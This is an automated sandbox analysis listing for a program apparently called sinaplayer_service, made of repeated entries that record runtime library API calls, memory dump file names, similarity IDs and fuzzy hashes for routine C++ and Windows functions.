• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
Similarity
• API ID: ??3@Xlength_error@std@@memcpy
• String ID: string too long
• API String ID: 1370519046-2556327735
APIs
• ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long), ref: 00371304
• memcpy.MSVCR120(?,?,?), ref: 0037134D
• ??3@YAXPAX@Z.MSVCR120(?), ref: 00371359
Strings
Memory Dump Source
• Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
Similarity
• API ID: ??3@Xlength_error@std@@memcpy
• String ID: string too long
• API String ID: 1370519046-2556327735
APIs
• ?_New_Locimp@_Locimp@locale@std@@CAPAV123@_N@Z.MSVCP120(00000000,8285FFAB), ref: 0038A561
• ?_Xruntime_error@std@@YAXPBD@Z.MSVCP120(bad locale name), ref: 0038A575
• ??3@YAXPAX@Z.MSVCR120(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B518,000000FF), ref: 0038A5D1
Strings
Memory Dump Source
• Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
Similarity
• API ID: ??3@Locimp@_Locimp@locale@std@@New_V123@_Xruntime_error@std@@
• String ID: bad locale name
• API String ID: 79456547-1405518554
APIs
• RtlUnwind.KERNEL32(?,6C585811,80000026,00000000,?,?), ref: 6C58580C
• _local_unwind2.MSVCR120(?,?,?), ref: 6C585825
Strings
Memory Dump Source
• Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
Similarity
• API ID: Unwind_local_unwind2
• String ID: &$02CV
• API String ID: 2435528123-3673091860
APIs
• ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,?,00000000), ref: 0038ADB4
• GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000,S:(ML;;NW;;;S-1-16-4096),00000018,00000000), ref: 0038ADCC
• ??3@YAXPAX@Z.MSVCR120(?,S:(ML;;NW;;;S-1-16-4096),00000018,00000000), ref: 0038ADE6
Strings
• S:(ML;;NW;;;S-1-16-4096), xrefs: 0038AD6C
Memory Dump Source
• Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
Similarity
• API ID: DescriptorSecurity$??3@ConvertSaclString
• String ID: S:(ML;;NW;;;S-1-16-4096)
• API String ID: 1527178151-1713697446
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?,8285FFAB,?,0039B190,000000FF,?,00388981,?,8285FFAB,?,?,00000001,?,00000001,00000000,0039A9DB), ref: 00388202
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(0000010D,00000000,?,?,?,?,?,?,00388981,?,8285FFAB,?,?), ref: 0038823D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,00388981), ref: 0038824C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@Base@internal@base@@CallbackD@2@@std@@D@std@@FilePath@base@@U?$char_traits@Unsafe@V?$allocator@V?$basic_string@
                                                                                                                                                                                                    • String ID: file_name
                                                                                                                                                                                                    • API String ID: 1700762032-3621721704
                                                                                                                                                                                                    • Opcode ID: c276f25c8eb9b3c7fa08e8aa1864b73aea8c90b2fcf541c1289c718901891c77
                                                                                                                                                                                                    • Instruction ID: e2aad09f51738c3bcb5898c7a26d40935c51216cc0e6bd2e87432e110d73f908
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c276f25c8eb9b3c7fa08e8aa1864b73aea8c90b2fcf541c1289c718901891c77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 341186B181424CEFDF06EB94DD45FEEBBB8FB05714F00456AE806A7281DB755A44CB50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,?,?,003771C3,?,8285FFAB,00000000,00000000,00000000,0000003C,00000000), ref: 0037D324
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000003C,0000003C,?,?,003771C3,?,8285FFAB,00000000,00000000,00000000,0000003C,00000000), ref: 0037D332
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 373104503-3788999226
                                                                                                                                                                                                    • Opcode ID: c963df41a9a7a0a1fae4066955e74e870d1eab1ed8e9df5b93a881f8fb47618a
                                                                                                                                                                                                    • Instruction ID: 7f4af81849699a39261d76fe6072b70d5878565f363b9e47fcc5676c7c94893c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c963df41a9a7a0a1fae4066955e74e870d1eab1ed8e9df5b93a881f8fb47618a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACF024725003115FD3219F58E901797B7E8AF54710F00882EE65EC7200E7B9E441CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfowcslen
                                                                                                                                                                                                    • String ID: I
                                                                                                                                                                                                    • API String ID: 2689964535-3707901625
                                                                                                                                                                                                    • Opcode ID: 9c37a6a3ebfe66e9fcd513b538005e3099b3ebd00d8d87435b18cd7b5d3d85b2
                                                                                                                                                                                                    • Instruction ID: 1f75a03ac49ce6d6228936a21bf7757bffbab0f755a04ca6fcdd1867818c15e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c37a6a3ebfe66e9fcd513b538005e3099b3ebd00d8d87435b18cd7b5d3d85b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A017172D0121ADBDF109FA9DC016EE7BB4FF05329F100616E934A66E0D77585268BE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfostrlen
                                                                                                                                                                                                    • String ID: I
                                                                                                                                                                                                    • API String ID: 1371076374-3707901625
                                                                                                                                                                                                    • Opcode ID: a5f64acb0cfe6047d5516fa7c526f73389597081c2670116c273927e34166219
                                                                                                                                                                                                    • Instruction ID: 46a6016edd9b850f6ecf010568995258c4204eadf312f71891b0e3e46d6fa75e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5f64acb0cfe6047d5516fa7c526f73389597081c2670116c273927e34166219
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E801B171C002199BDF009FA9DC006EE7BB8EF48325F10061AE920A6690DB7589118BE5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?,?,6C5BAF12), ref: 6C5BAF79
                                                                                                                                                                                                      • Part of subcall function 6C55ECE0: HeapFree.KERNEL32(00000000,00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C55ECF4
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,6C5BAF12), ref: 6C5BAF81
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5BAF12), ref: 6C5BAF89
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6C5BAF12), ref: 6C5BAF91
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,6C5BAF12), ref: 6C5BAF97
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 32654580-0
                                                                                                                                                                                                    • Opcode ID: 35c46fae50c05662356181fb7ad4d344ed15a287719cd2b1bd15bcf9abf46fa9
                                                                                                                                                                                                    • Instruction ID: 797989dcf600938e2b32f590a8491f2809d9c9ebb8a9f1e150a926bbf16f6e55
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35c46fae50c05662356181fb7ad4d344ed15a287719cd2b1bd15bcf9abf46fa9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81D0A731482E20DBC6232F24ED039CB76517FA02583810D27B48131F309B99FC3897D4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __forcdecpt_l_mbtowc_lstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 810383619-0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6C5BE97B
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::FlushHistories.LIBCMT ref: 6C5BE990
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::Hill$FlushHistoriesHistory
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2521976074-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6C5B9F50,?,?,?,?,00000000,00000000), ref: 6C5BAB46
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6C5B9F50,?,?,?,?,00000000,00000000), ref: 6C5BAB66
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5BAC8A
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5BAC93
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@ABV01@@Z.BASE(?,8285FFAB,00000000,8285FFAB,?,?,?,?,0000003C,003994D9,000000FF,?,0037696A,0000003C,?), ref: 00376F67
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?,?,8285FFAB,00000000,8285FFAB,?,?,?,?,0000003C,003994D9,000000FF,?,0037696A,0000003C,?), ref: 00376F78
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(0000003C,?,8285FFAB,00000000,8285FFAB,?,?,?,?,0000003C,003994D9,000000FF,?,0037696A,0000003C,?), ref: 00376F84
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(?,8285FFAB,00000000,8285FFAB,?,?,?,?,0000003C,003994D9,000000FF,?,0037696A,0000003C,?), ref: 00376F94
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePath@base@@$V01@@$V01@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2909396759-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$??2@??3@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2316506902-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?,8285FFAB,?,?,?), ref: 00374858
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(8285FFAB,?,?,?), ref: 00374869
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Xbad_alloc@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3683936438-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?,8285FFAB,?,?,?), ref: 003711F1
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(8285FFAB,?,?,?), ref: 00371200
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Xbad_alloc@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3683936438-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000001,00391EAE,00000000), ref: 00391F85
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C55F764: _getptd.MSVCR120(00000001,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C55F77A
                                                                                                                                                                                                    • _isleadbyte_l.MSVCR120(?,?), ref: 6C56EF4B
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5A5D30,00000001,00000000,00000000), ref: 6C56EF73
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5A5D30,00000001,00000000,00000000), ref: 6C5A6F4D
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A6F6D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$_errno_getptd_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3831352077-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00391089,000000FF,00000000,00000000,00000000,00000000,00391DBA,?,?), ref: 00392097
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000), ref: 0038A407
                                                                                                                                                                                                    • ??0?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120 ref: 0038A431
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 0038A44B
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000,?,?,00000000), ref: 0038A48D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@_$W@std@@@std@@$??0?$basic_ostream@_??0?$basic_streambuf@_?setstate@?$basic_ios@_Init@?$basic_streambuf@_V?$basic_streambuf@_W@std@@@1@_
